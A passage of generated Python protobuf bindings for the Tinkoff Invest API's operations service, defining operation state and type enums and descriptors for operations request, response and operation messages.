\x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12M\n\x12total_amount_bonds\x18\x02 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12K\n\x10total_amount_etf\x18\x03 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12R\n\x17total_amount_currencies\x18\x04 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12O\n\x14total_amount_futures\x18\x05 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12H\n\x0e\x65xpected_yield\x18\x06 \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12K\n\tpositions\x18\x07 \x03(\x0b\x32\x38.tinkoff.public.invest.api.contract.v1.PortfolioPosition\"&\n\x10PositionsRequest\x12\x12\n\naccount_id\x18\x01 \x01(\t\"\xd7\x02\n\x11PositionsResponse\x12@\n\x05money\x18\x01 \x03(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12\x42\n\x07\x62locked\x18\x02 \x03(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12N\n\nsecurities\x18\x03 \x03(\x0b\x32:.tinkoff.public.invest.api.contract.v1.PositionsSecurities\x12\"\n\x1alimits_loading_in_progress\x18\x04 \x01(\x08\x12H\n\x07\x66utures\x18\x05 \x03(\x0b\x32\x37.tinkoff.public.invest.api.contract.v1.PositionsFutures\"+\n\x15WithdrawLimitsRequest\x12\x12\n\naccount_id\x18\x01 \x01(\t\"\xec\x01\n\x16WithdrawLimitsResponse\x12@\n\x05money\x18\x01 \x03(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12\x42\n\x07\x62locked\x18\x02 \x03(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12L\n\x11\x62locked_guarantee\x18\x03 \x03(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\"\xa3\x05\n\x11PortfolioPosition\x12\x0c\n\x04\x66igi\x18\x01 \x01(\t\x12\x17\n\x0finstrument_type\x18\x02 \x01(\t\x12\x42\n\x08quantity\x18\x03 \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12Q\n\x16\x61verage_position_price\x18\x04 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12H\n\x0e\x65xpected_yield\x18\x05 
\x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12\x46\n\x0b\x63urrent_nkd\x18\x06 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12S\n\x19\x61verage_position_price_pt\x18\x07 \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12H\n\rcurrent_price\x18\x08 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12V\n\x1b\x61verage_position_price_fifo\x18\t \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12G\n\rquantity_lots\x18\n \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\"E\n\x13PositionsSecurities\x12\x0c\n\x04\x66igi\x18\x01 \x01(\t\x12\x0f\n\x07\x62locked\x18\x02 \x01(\x03\x12\x0f\n\x07\x62\x61lance\x18\x03 \x01(\x03\"B\n\x10PositionsFutures\x12\x0c\n\x04\x66igi\x18\x01 \x01(\t\x12\x0f\n\x07\x62locked\x18\x02 \x01(\x03\x12\x0f\n\x07\x62\x61lance\x18\x03 \x01(\x03\"\xf2\x01\n\x13\x42rokerReportRequest\x12l\n\x1egenerate_broker_report_request\x18\x01 \x01(\x0b\x32\x42.tinkoff.public.invest.api.contract.v1.GenerateBrokerReportRequestH\x00\x12\x62\n\x19get_broker_report_request\x18\x02 \x01(\x0b\x32=.tinkoff.public.invest.api.contract.v1.GetBrokerReportRequestH\x00\x42\t\n\x07payload\"\xf7\x01\n\x14\x42rokerReportResponse\x12n\n\x1fgenerate_broker_report_response\x18\x01 \x01(\x0b\x32\x43.tinkoff.public.invest.api.contract.v1.GenerateBrokerReportResponseH\x00\x12\x64\n\x1aget_broker_report_response\x18\x02 \x01(\x0b\x32>.tinkoff.public.invest.api.contract.v1.GetBrokerReportResponseH\x00\x42\t\n\x07payload\"\x83\x01\n\x1bGenerateBrokerReportRequest\x12\x12\n\naccount_id\x18\x01 \x01(\t\x12(\n\x04\x66rom\x18\x02 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12&\n\x02to\x18\x03 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\"/\n\x1cGenerateBrokerReportResponse\x12\x0f\n\x07task_id\x18\x01 \x01(\t\"7\n\x16GetBrokerReportRequest\x12\x0f\n\x07task_id\x18\x01 \x01(\t\x12\x0c\n\x04page\x18\x02 
\x01(\x05\"\x9b\x01\n\x17GetBrokerReportResponse\x12J\n\rbroker_report\x18\x01 \x03(\x0b\x32\x33.tinkoff.public.invest.api.contract.v1.BrokerReport\x12\x12\n\nitemsCount\x18\x02 \x01(\x05\x12\x12\n\npagesCount\x18\x03 \x01(\x05\x12\x0c\n\x04page\x18\x04 \x01(\x05\"\xda\x08\n\x0c\x42rokerReport\x12\x10\n\x08trade_id\x18\x01 \x01(\t\x12\x10\n\x08order_id\x18\x02 \x01(\t\x12\x0c\n\x04\x66igi\x18\x03 \x01(\t\x12\x14\n\x0c\x65xecute_sign\x18\x04 \x01(\t\x12\x32\n\x0etrade_datetime\x18\x05 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x10\n\x08\x65xchange\x18\x06 \x01(\t\x12\x12\n\nclass_code\x18\x07 \x01(\t\x12\x11\n\tdirection\x18\x08 \x01(\t\x12\x0c\n\x04name\x18\t \x01(\t\x12\x0e\n\x06ticker\x18\n \x01(\t\x12@\n\x05price\x18\x0b \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12\x10\n\x08quantity\x18\x0c \x01(\x03\x12G\n\x0corder_amount\x18\r \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12\x43\n\taci_value\x18\x0e \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12M\n\x12total_order_amount\x18\x0f \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12L\n\x11\x62roker_commission\x18\x10 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12N\n\x13\x65xchange_commission\x18\x11 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12W\n\x1c\x65xchange_clearing_commission\x18\x12 \x01(\x0b\x32\x31.tinkoff.public.invest.api.contract.v1.MoneyValue\x12\x43\n\trepo_rate\x18\x13 \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12\r\n\x05party\x18\x14 \x01(\t\x12\x34\n\x10\x63lear_value_date\x18\x15 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x32\n\x0esec_value_date\x18\x16 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x15\n\rbroker_status\x18\x17 \x01(\t\x12\x1f\n\x17separate_agreement_type\x18\x18 \x01(\t\x12!\n\x19separate_agreement_number\x18\x19 \x01(\t\x12\x1f\n\x17separate_agreement_date\x18\x1a \x01(\t\x12\x15\n\rdelivery_type\x18\x1b 
\x01(\t\"\xa8\x02\n GetDividendsForeignIssuerRequest\x12\x80\x01\n\"generate_div_foreign_issuer_report\x18\x01 \x01(\x0b\x32R.tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportRequestH\x00\x12v\n\x1dget_div_foreign_issuer_report\x18\x02 \x01(\x0b\x32M.tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportRequestH\x00\x42\t\n\x07payload\"\xb0\x02\n!GetDividendsForeignIssuerResponse\x12\x8a\x01\n+generate_div_foreign_issuer_report_response\x18\x01 \x01(\x0b\x32S.tinkoff.public.invest.api.contract.v1.GenerateDividendsForeignIssuerReportResponseH\x00\x12s\n\x19\x64iv_foreign_issuer_report\x18\x02 \x01(\x0b\x32N.tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerReportResponseH\x00\x42\t\n\x07payload\"\x93\x01\n+GenerateDividendsForeignIssuerReportRequest\x12\x12\n\naccount_id\x18\x01 \x01(\t\x12(\n\x04\x66rom\x18\x02 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12&\n\x02to\x18\x03 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\"G\n&GetDividendsForeignIssuerReportRequest\x12\x0f\n\x07task_id\x18\x01 \x01(\t\x12\x0c\n\x04page\x18\x02 \x01(\x05\"?\n,GenerateDividendsForeignIssuerReportResponse\x12\x0f\n\x07task_id\x18\x01 \x01(\t\"\xcd\x01\n\'GetDividendsForeignIssuerReportResponse\x12l\n\x1f\x64ividends_foreign_issuer_report\x18\x01 \x03(\x0b\x32\x43.tinkoff.public.invest.api.contract.v1.DividendsForeignIssuerReport\x12\x12\n\nitemsCount\x18\x02 \x01(\x05\x12\x12\n\npagesCount\x18\x03 \x01(\x05\x12\x0c\n\x04page\x18\x04 \x01(\x05\"\xc9\x04\n\x1c\x44ividendsForeignIssuerReport\x12/\n\x0brecord_date\x18\x01 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x30\n\x0cpayment_date\x18\x02 \x01(\x0b\x32\x1a.google.protobuf.Timestamp\x12\x15\n\rsecurity_name\x18\x03 \x01(\t\x12\x0c\n\x04isin\x18\x04 \x01(\t\x12\x16\n\x0eissuer_country\x18\x05 \x01(\t\x12\x10\n\x08quantity\x18\x06 \x01(\x03\x12\x42\n\x08\x64ividend\x18\x07 \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12M\n\x13\x65xternal_commission\x18\x08 
\x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12H\n\x0e\x64ividend_gross\x18\t \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12=\n\x03tax\x18\n \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12I\n\x0f\x64ividend_amount\x18\x0b \x01(\x0b\x32\x30.tinkoff.public.invest.api.contract.v1.Quotation\x12\x10\n\x08\x63urrency\x18\x0c \x01(\t*m\n\x0eOperationState\x12\x1f\n\x1bOPERATION_STATE_UNSPECIFIED\x10\x00\x12\x1c\n\x18OPERATION_STATE_EXECUTED\x10\x01\x12\x1c\n\x18OPERATION_STATE_CANCELED\x10\x02*\x8f\x0c\n\rOperationType\x12\x1e\n\x1aOPERATION_TYPE_UNSPECIFIED\x10\x00\x12\x18\n\x14OPERATION_TYPE_INPUT\x10\x01\x12\x1b\n\x17OPERATION_TYPE_BOND_TAX\x10\x02\x12$\n OPERATION_TYPE_OUTPUT_SECURITIES\x10\x03\x12\x1c\n\x18OPERATION_TYPE_OVERNIGHT\x10\x04\x12\x16\n\x12OPERATION_TYPE_TAX\x10\x05\x12&\n\"OPERATION_TYPE_BOND_REPAYMENT_FULL\x10\x06\x12\x1c\n\x18OPERATION_TYPE_SELL_CARD\x10\x07\x12\x1f\n\x1bOPERATION_TYPE_DIVIDEND_TAX\x10\x08\x12\x19\n\x15OPERATION_TYPE_OUTPUT\x10\t\x12!\n\x1dOPERATION_TYPE_BOND_REPAYMENT\x10\n\x12!\n\x1dOPERATION_TYPE_TAX_CORRECTION\x10\x0b\x12\x1e\n\x1aOPERATION_TYPE_SERVICE_FEE\x10\x0c\x12\x1e\n\x1aOPERATION_TYPE_BENEFIT_TAX\x10\r\x12\x1d\n\x19OPERATION_TYPE_MARGIN_FEE\x10\x0e\x12\x16\n\x12OPERATION_TYPE_BUY\x10\x0f\x12\x1b\n\x17OPERATION_TYPE_BUY_CARD\x10\x10\x12#\n\x1fOPERATION_TYPE_INPUT_SECURITIES\x10\x11\x12\x1e\n\x1aOPERATION_TYPE_SELL_MARGIN\x10\x12\x12\x1d\n\x19OPERATION_TYPE_BROKER_FEE\x10\x13\x12\x1d\n\x19OPERATION_TYPE_BUY_MARGIN\x10\x14\x12\x1b\n\x17OPERATION_TYPE_DIVIDEND\x10\x15\x12\x17\n\x13OPERATION_TYPE_SELL\x10\x16\x12\x19\n\x15OPERATION_TYPE_COUPON\x10\x17\x12\x1e\n\x1aOPERATION_TYPE_SUCCESS_FEE\x10\x18\x12$\n OPERATION_TYPE_DIVIDEND_TRANSFER\x10\x19\x12%\n!OPERATION_TYPE_ACCRUING_VARMARGIN\x10\x1a\x12(\n$OPERATION_TYPE_WRITING_OFF_VARMARGIN\x10\x1b\x12\x1f\n\x1bOPERATION_TYPE_DELIVERY_BUY\x10\x1c\x12 
\n\x1cOPERATION_TYPE_DELIVERY_SELL\x10\x1d\x12\x1d\n\x19OPERATION_TYPE_TRACK_MFEE\x10\x1e\x12\x1d\n\x19OPERATION_TYPE_TRACK_PFEE\x10\x1f\x12\"\n\x1eOPERATION_TYPE_TAX_PROGRESSIVE\x10 \x12\'\n#OPERATION_TYPE_BOND_TAX_PROGRESSIVE\x10!\x12+\n\'OPERATION_TYPE_DIVIDEND_TAX_PROGRESSIVE\x10\"\x12*\n&OPERATION_TYPE_BENEFIT_TAX_PROGRESSIVE\x10#\x12-\n)OPERATION_TYPE_TAX_CORRECTION_PROGRESSIVE\x10$\x12\'\n#OPERATION_TYPE_TAX_REPO_PROGRESSIVE\x10%\x12\x1b\n\x17OPERATION_TYPE_TAX_REPO\x10&\x12 \n\x1cOPERATION_TYPE_TAX_REPO_HOLD\x10\'\x12\"\n\x1eOPERATION_TYPE_TAX_REPO_REFUND\x10(\x12,\n(OPERATION_TYPE_TAX_REPO_HOLD_PROGRESSIVE\x10)\x12.\n*OPERATION_TYPE_TAX_REPO_REFUND_PROGRESSIVE\x10*\x12\x1a\n\x16OPERATION_TYPE_DIV_EXT\x10+\x12(\n$OPERATION_TYPE_TAX_CORRECTION_COUPON\x10,2\xf3\x06\n\x11OperationsService\x12\x84\x01\n\rGetOperations\x12\x38.tinkoff.public.invest.api.contract.v1.OperationsRequest\x1a\x39.tinkoff.public.invest.api.contract.v1.OperationsResponse\x12\x81\x01\n\x0cGetPortfolio\x12\x37.tinkoff.public.invest.api.contract.v1.PortfolioRequest\x1a\x38.tinkoff.public.invest.api.contract.v1.PortfolioResponse\x12\x81\x01\n\x0cGetPositions\x12\x37.tinkoff.public.invest.api.contract.v1.PositionsRequest\x1a\x38.tinkoff.public.invest.api.contract.v1.PositionsResponse\x12\x90\x01\n\x11GetWithdrawLimits\x12<.tinkoff.public.invest.api.contract.v1.WithdrawLimitsRequest\x1a=.tinkoff.public.invest.api.contract.v1.WithdrawLimitsResponse\x12\x8a\x01\n\x0fGetBrokerReport\x12:.tinkoff.public.invest.api.contract.v1.BrokerReportRequest\x1a;.tinkoff.public.invest.api.contract.v1.BrokerReportResponse\x12\xae\x01\n\x19GetDividendsForeignIssuer\x12G.tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerRequest\x1aH.tinkoff.public.invest.api.contract.v1.GetDividendsForeignIssuerResponseBa\n\x1cru.tinkoff.piapi.contract.v1P\x01Z\x0c./;investapi\xa2\x02\x05TIAPI\xaa\x02\x14Tinkoff.InvestApi.V1\xca\x02\x11Tinkoff\\Invest\\V1b\x06proto3'
,
dependencies=[google_dot_protobuf_dot_timestamp__pb2.DESCRIPTOR,tinkoff_dot_invest_dot_grpc_dot_common__pb2.DESCRIPTOR,])
# Value names for tinkoff.public.invest.api.contract.v1.OperationState.
# List position serves as both the descriptor index and the wire number
# (the original generated code used index == number for every entry).
_OPERATION_STATE_NAMES = [
    'OPERATION_STATE_UNSPECIFIED',
    'OPERATION_STATE_EXECUTED',
    'OPERATION_STATE_CANCELED',
]

# EnumDescriptor for OperationState; serialized_start/end locate the enum
# inside DESCRIPTOR's serialized file data and must match the .proto layout.
_OPERATIONSTATE = _descriptor.EnumDescriptor(
    name='OperationState',
    full_name='tinkoff.public.invest.api.contract.v1.OperationState',
    filename=None,
    file=DESCRIPTOR,
    create_key=_descriptor._internal_create_key,
    values=[
        _descriptor.EnumValueDescriptor(
            name=value_name, index=position, number=position,
            serialized_options=None,
            type=None,
            create_key=_descriptor._internal_create_key)
        for position, value_name in enumerate(_OPERATION_STATE_NAMES)
    ],
    containing_type=None,
    serialized_options=None,
    serialized_start=6977,
    serialized_end=7086,
)
_sym_db.RegisterEnumDescriptor(_OPERATIONSTATE)

# Public enum wrapper exposing OperationState.Value()/Name() and the constants.
OperationState = enum_type_wrapper.EnumTypeWrapper(_OPERATIONSTATE)
# Value names for tinkoff.public.invest.api.contract.v1.OperationType.
# List position serves as both the descriptor index and the wire number
# (the original generated code used index == number for all 45 entries).
_OPERATION_TYPE_NAMES = [
    'OPERATION_TYPE_UNSPECIFIED',
    'OPERATION_TYPE_INPUT',
    'OPERATION_TYPE_BOND_TAX',
    'OPERATION_TYPE_OUTPUT_SECURITIES',
    'OPERATION_TYPE_OVERNIGHT',
    'OPERATION_TYPE_TAX',
    'OPERATION_TYPE_BOND_REPAYMENT_FULL',
    'OPERATION_TYPE_SELL_CARD',
    'OPERATION_TYPE_DIVIDEND_TAX',
    'OPERATION_TYPE_OUTPUT',
    'OPERATION_TYPE_BOND_REPAYMENT',
    'OPERATION_TYPE_TAX_CORRECTION',
    'OPERATION_TYPE_SERVICE_FEE',
    'OPERATION_TYPE_BENEFIT_TAX',
    'OPERATION_TYPE_MARGIN_FEE',
    'OPERATION_TYPE_BUY',
    'OPERATION_TYPE_BUY_CARD',
    'OPERATION_TYPE_INPUT_SECURITIES',
    'OPERATION_TYPE_SELL_MARGIN',
    'OPERATION_TYPE_BROKER_FEE',
    'OPERATION_TYPE_BUY_MARGIN',
    'OPERATION_TYPE_DIVIDEND',
    'OPERATION_TYPE_SELL',
    'OPERATION_TYPE_COUPON',
    'OPERATION_TYPE_SUCCESS_FEE',
    'OPERATION_TYPE_DIVIDEND_TRANSFER',
    'OPERATION_TYPE_ACCRUING_VARMARGIN',
    'OPERATION_TYPE_WRITING_OFF_VARMARGIN',
    'OPERATION_TYPE_DELIVERY_BUY',
    'OPERATION_TYPE_DELIVERY_SELL',
    'OPERATION_TYPE_TRACK_MFEE',
    'OPERATION_TYPE_TRACK_PFEE',
    'OPERATION_TYPE_TAX_PROGRESSIVE',
    'OPERATION_TYPE_BOND_TAX_PROGRESSIVE',
    'OPERATION_TYPE_DIVIDEND_TAX_PROGRESSIVE',
    'OPERATION_TYPE_BENEFIT_TAX_PROGRESSIVE',
    'OPERATION_TYPE_TAX_CORRECTION_PROGRESSIVE',
    'OPERATION_TYPE_TAX_REPO_PROGRESSIVE',
    'OPERATION_TYPE_TAX_REPO',
    'OPERATION_TYPE_TAX_REPO_HOLD',
    'OPERATION_TYPE_TAX_REPO_REFUND',
    'OPERATION_TYPE_TAX_REPO_HOLD_PROGRESSIVE',
    'OPERATION_TYPE_TAX_REPO_REFUND_PROGRESSIVE',
    'OPERATION_TYPE_DIV_EXT',
    'OPERATION_TYPE_TAX_CORRECTION_COUPON',
]

# EnumDescriptor for OperationType; serialized_start/end locate the enum
# inside DESCRIPTOR's serialized file data and must match the .proto layout.
_OPERATIONTYPE = _descriptor.EnumDescriptor(
    name='OperationType',
    full_name='tinkoff.public.invest.api.contract.v1.OperationType',
    filename=None,
    file=DESCRIPTOR,
    create_key=_descriptor._internal_create_key,
    values=[
        _descriptor.EnumValueDescriptor(
            name=value_name, index=position, number=position,
            serialized_options=None,
            type=None,
            create_key=_descriptor._internal_create_key)
        for position, value_name in enumerate(_OPERATION_TYPE_NAMES)
    ],
    containing_type=None,
    serialized_options=None,
    serialized_start=7089,
    serialized_end=8640,
)
_sym_db.RegisterEnumDescriptor(_OPERATIONTYPE)

# Public enum wrapper exposing OperationType.Value()/Name() and the constants.
OperationType = enum_type_wrapper.EnumTypeWrapper(_OPERATIONTYPE)
# Module-level aliases for the enum values, mirroring what protoc exports so
# callers can write e.g. operations_pb2.OPERATION_TYPE_BUY directly instead of
# going through the OperationState / OperationType wrappers.
# OperationState values:
OPERATION_STATE_UNSPECIFIED = 0
OPERATION_STATE_EXECUTED = 1
OPERATION_STATE_CANCELED = 2
# OperationType values:
OPERATION_TYPE_UNSPECIFIED = 0
OPERATION_TYPE_INPUT = 1
OPERATION_TYPE_BOND_TAX = 2
OPERATION_TYPE_OUTPUT_SECURITIES = 3
OPERATION_TYPE_OVERNIGHT = 4
OPERATION_TYPE_TAX = 5
OPERATION_TYPE_BOND_REPAYMENT_FULL = 6
OPERATION_TYPE_SELL_CARD = 7
OPERATION_TYPE_DIVIDEND_TAX = 8
OPERATION_TYPE_OUTPUT = 9
OPERATION_TYPE_BOND_REPAYMENT = 10
OPERATION_TYPE_TAX_CORRECTION = 11
OPERATION_TYPE_SERVICE_FEE = 12
OPERATION_TYPE_BENEFIT_TAX = 13
OPERATION_TYPE_MARGIN_FEE = 14
OPERATION_TYPE_BUY = 15
OPERATION_TYPE_BUY_CARD = 16
OPERATION_TYPE_INPUT_SECURITIES = 17
OPERATION_TYPE_SELL_MARGIN = 18
OPERATION_TYPE_BROKER_FEE = 19
OPERATION_TYPE_BUY_MARGIN = 20
OPERATION_TYPE_DIVIDEND = 21
OPERATION_TYPE_SELL = 22
OPERATION_TYPE_COUPON = 23
OPERATION_TYPE_SUCCESS_FEE = 24
OPERATION_TYPE_DIVIDEND_TRANSFER = 25
OPERATION_TYPE_ACCRUING_VARMARGIN = 26
OPERATION_TYPE_WRITING_OFF_VARMARGIN = 27
OPERATION_TYPE_DELIVERY_BUY = 28
OPERATION_TYPE_DELIVERY_SELL = 29
OPERATION_TYPE_TRACK_MFEE = 30
OPERATION_TYPE_TRACK_PFEE = 31
OPERATION_TYPE_TAX_PROGRESSIVE = 32
OPERATION_TYPE_BOND_TAX_PROGRESSIVE = 33
OPERATION_TYPE_DIVIDEND_TAX_PROGRESSIVE = 34
OPERATION_TYPE_BENEFIT_TAX_PROGRESSIVE = 35
OPERATION_TYPE_TAX_CORRECTION_PROGRESSIVE = 36
OPERATION_TYPE_TAX_REPO_PROGRESSIVE = 37
OPERATION_TYPE_TAX_REPO = 38
OPERATION_TYPE_TAX_REPO_HOLD = 39
OPERATION_TYPE_TAX_REPO_REFUND = 40
OPERATION_TYPE_TAX_REPO_HOLD_PROGRESSIVE = 41
OPERATION_TYPE_TAX_REPO_REFUND_PROGRESSIVE = 42
OPERATION_TYPE_DIV_EXT = 43
OPERATION_TYPE_TAX_CORRECTION_COUPON = 44
# Descriptor for the OperationsRequest message (the request of
# OperationsService.GetOperations): account, [from, to] time window, state
# filter and FIGI filter. Field type/cpp_type codes are protoc-generated
# (9 = string, 11 = message, 14 = enum); serialized_start/end locate the
# message inside DESCRIPTOR's serialized file data.
_OPERATIONSREQUEST = _descriptor.Descriptor(
name='OperationsRequest',
full_name='tinkoff.public.invest.api.contract.v1.OperationsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
# string account_id = 1;
_descriptor.FieldDescriptor(
name='account_id', full_name='tinkoff.public.invest.api.contract.v1.OperationsRequest.account_id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
# google.protobuf.Timestamp from = 2;
_descriptor.FieldDescriptor(
name='from', full_name='tinkoff.public.invest.api.contract.v1.OperationsRequest.from', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
# google.protobuf.Timestamp to = 3;
_descriptor.FieldDescriptor(
name='to', full_name='tinkoff.public.invest.api.contract.v1.OperationsRequest.to', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
# OperationState state = 4;
_descriptor.FieldDescriptor(
name='state', full_name='tinkoff.public.invest.api.contract.v1.OperationsRequest.state', index=3,
number=4, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
# string figi = 5;
_descriptor.FieldDescriptor(
name='figi', full_name='tinkoff.public.invest.api.contract.v1.OperationsRequest.figi', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=147,
serialized_end=352,
)
# Generated protobuf Descriptor for the OperationsResponse message
# (tinkoff.public.invest.api.contract.v1). protoc output — do not edit by hand.
# Single field: 'operations', a repeated (label=3) message field (type=11).
_OPERATIONSRESPONSE = _descriptor.Descriptor(
  name='OperationsResponse',
  full_name='tinkoff.public.invest.api.contract.v1.OperationsResponse',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='operations', full_name='tinkoff.public.invest.api.contract.v1.OperationsResponse.operations', index=0,
      number=1, type=11, cpp_type=10, label=3,
      has_default_value=False, default_value=[],
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
  ],
  extensions=[
  ],
  nested_types=[],
  enum_types=[
  ],
  serialized_options=None,
  is_extendable=False,
  syntax='proto3',
  extension_ranges=[],
  oneofs=[
  ],
  # Byte offsets of this message's definition inside DESCRIPTOR.serialized_pb.
  serialized_start=354,
  serialized_end=444,
)
# Generated protobuf Descriptor for the Operation message
# (tinkoff.public.invest.api.contract.v1). protoc output — do not edit by hand.
# Field type codes: 9=string, 11=message, 14=enum, 3=int64; label=3 is repeated.
_OPERATION = _descriptor.Descriptor(
  name='Operation',
  full_name='tinkoff.public.invest.api.contract.v1.Operation',
  filename=None,
  file=DESCRIPTOR,
  containing_type=None,
  create_key=_descriptor._internal_create_key,
  fields=[
    _descriptor.FieldDescriptor(
      name='id', full_name='tinkoff.public.invest.api.contract.v1.Operation.id', index=0,
      number=1, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='parent_operation_id', full_name='tinkoff.public.invest.api.contract.v1.Operation.parent_operation_id', index=1,
      number=2, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='currency', full_name='tinkoff.public.invest.api.contract.v1.Operation.currency', index=2,
      number=3, type=9, cpp_type=9, label=1,
      has_default_value=False, default_value=b"".decode('utf-8'),
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='payment', full_name='tinkoff.public.invest.api.contract.v1.Operation.payment', index=3,
      number=4, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='price', full_name='tinkoff.public.invest.api.contract.v1.Operation.price', index=4,
      number=5, type=11, cpp_type=10, label=1,
      has_default_value=False, default_value=None,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='state', full_name='tinkoff.public.invest.api.contract.v1.Operation.state', index=5,
      number=6, type=14, cpp_type=8, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='quantity', full_name='tinkoff.public.invest.api.contract.v1.Operation.quantity', index=6,
      number=7, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='quantity_rest', full_name='tinkoff.public.invest.api.contract.v1.Operation.quantity_rest', index=7,
      number=8, type=3, cpp_type=2, label=1,
      has_default_value=False, default_value=0,
      message_type=None, enum_type=None, containing_type=None,
      is_extension=False, extension_scope=None,
      serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
    _descriptor.FieldDescriptor(
      name='figi', full_name='tinkoff.public.invest.api.contract.v1.Operation.figi', index=8,
      number=9, type=9, cpp_type=9, label=1,
